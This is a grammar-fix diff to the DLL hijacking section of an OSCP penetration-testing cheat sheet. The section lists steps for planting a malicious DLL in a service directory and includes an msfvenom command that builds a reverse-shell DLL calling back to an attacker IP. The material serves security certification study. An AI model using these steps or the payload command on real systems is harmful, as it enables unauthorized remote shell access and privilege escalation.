saisathvik1/OSCP-Cheatsheet/README.md

 ## DLL Hijacking

-1. Find Missing DLLs using Process Monitor, Identify a specific service which looks suspicious and add a filter.
+1. Find Missing DLLs using Process Monitor, Identify a specific service that looks suspicious, and add a filter.
 2. Check whether you have write permissions in the directory associated with the service.
 ```bash
 # Create a reverse-shell
 msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attaker-IP> LPORT=<listening-port> -f dll > filename.dll
 ```
-3. Copy it to victom machine and them move it to the service associated directory.(Make sure the dll name is similar to missing name)
+3. Copy it to the victim machine and then move it to the service-associated directory.(Make sure the dll name is similar to the missing name)
-4. Start listener and restart service, you'll get a shell.
+4. Start the listener and restart the service; you'll get a shell.

 ## Autorun